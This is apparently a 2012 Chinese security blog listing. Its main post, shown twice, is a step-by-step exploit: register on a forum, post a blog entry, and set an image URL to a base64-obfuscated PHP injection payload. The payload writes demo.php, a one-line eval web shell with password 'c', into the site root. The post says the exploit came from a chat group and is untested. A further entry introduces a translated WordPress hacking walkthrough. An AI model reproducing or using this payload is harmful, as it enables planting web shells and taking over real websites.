群里发的,没有测试--!
1.注册任意账户
2.登陆用户,发表blog日志(注意是日志)
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志,论坛根目录下生成demo.php,一句发密码C
» 阅读全文
NO.THINKING 发表于 2012-04-27, 2:24 PM
群里发的,没有测试--!
1.注册任意账户
2.登陆用户,发表blog日志(注意是日志)
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志,论坛根目录下生成demo.php,一句发密码C
» 阅读全文
NO.THINKING 发表于 2012-04-18, 11:06 PM
NO.THINKING 发表于 2012-04-18, 11:02 PM
» 阅读全文
NO.THINKING 发表于 2012-04-17, 10:47 AM
原文:http://resources.infosecinstitute.com/hacking-a-wordpress-site 《Targeting and Hacking a WordPress Site》
问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的!
让我们来看看目标站点:hack-test.com
» 阅读全文
NO.THINKING 发表于 2012-04-13, 4:11 PM
NO.THINKING 发表于 2012-04-12, 4:45 PM
» 阅读全文